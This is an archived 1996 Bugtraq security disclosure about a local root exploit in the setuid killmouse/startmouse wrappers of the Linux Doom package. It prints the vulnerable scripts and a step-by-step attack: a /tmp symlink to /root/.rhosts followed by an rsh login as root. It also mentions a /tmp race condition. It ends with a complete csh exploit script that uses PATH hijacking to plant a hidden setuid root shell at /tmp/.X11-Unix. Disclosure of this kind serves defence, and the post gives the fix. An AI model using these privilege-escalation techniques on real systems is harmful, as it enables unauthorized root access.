Doom killmouse/startmouse vulnerability

From: Bo (bo@ebony.iaehv.nl)
Date: Sat, 14 Dec 1996 23:59:52 +0100 
To: Bugtraq

A word to the moderator:
Hi  Aleph.  It seems you were right in that if you look hard enough, the
root  bugs  will  come  your  way.  This time I have checked Underground
before  I  submitted  this, and the linux bugs collection do not mention
this  bug,  so  maybe  I  actually found a new one? It's hard to believe
since  it's  such  a lamer , very much like the autoreply(1) bug. Let me
know if I am onto something here, okay?

System:
Probably  Linux  specific.  Slackware  3.0 (installs Linux 1.2.13) which
have  gpm  utility  and/or  the  Doom  package installed are vulnerable.
Other distributions might be too.

Impact:
Local users can acquire root status.

Background:
The  problem  is  the  killmouse/startmouse command that is part of Doom
package  on  Linux  systems.  It  is  actually a C-wrapper that runs two
scripts  (killmouse.sh/startmouse.sh). It runs suid root.

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
  /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
  /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
  GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

Problem:
I would try to describe the problem but I can't stop laughing.

Exploit:
This  can  be  exploited  in  a few similar ways. Here's just one. Let's
assume  the  gpm  utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms

Fine,  it's  running.  Now  we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:

$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
 1407  ?  S     0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

Bingo.  On  some  systems gpm might not be started in /etc/rc.d/rc.local
so  the  startmouse  script will fail. But gpm might be running already.
If  neither of these conditions are met, note that startmouse.sh creates
/tmp/gpmscript  and runs it in a shell. There's a window of time between
creating  the  script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.


Solution:
Remove  setuid  bits  of  killmouse/startmouse.  Better yet - nuke them.
While your at it, nuke Doom too - it's a stupid game anyway :-)

Best regards,
                Bo (bo@ebony.iaehv.nl)

--
                "Heisenberg may have been here".

And here is the obvious exploit, written by " Sorcery / mj13":

#!/bin/csh
# Doom exploit by Sorcery / mj13
# Use it only on your system!
# doomroot.sh (mode 755 =)             
#
# File to remove if it fails: ~/gpm,/tmp/gpmkilled,/tmp/gpmscript,/tmp/.X11-Unix
# Guy to great if it worx: beigebox@mygale.org (yeah, that's me ! :) )
#
# FIX: rm -rf /usr/games/doom =) 
#

cp /bin/bash /tmp/.X11-Unix
touch /tmp/gpmkilled
cat << EOF >> ~/gpm
/bin/chown root.root /tmp/.X11-Unix
/bin/chmod 4755 /tmp/.X11-Unix
/bin/rm ~/gpm
EOF
chmod 755 ~/gpm
set oldpath = ( $path )
set path = ~/
/usr/games/doom/startmouse >& /dev/null
echo "\n         This should happen now! =)"
echo "/tmp/.X11-Unix is perhaps your paradise, guy!"
echo "       Found and Exploited by Sorcery\n"
/usr/bin/sleep 2 # let's wait for gpm to finish his work...            
set path = ( $oldpath )
/tmp/.X11-Unix

# End of doom exploit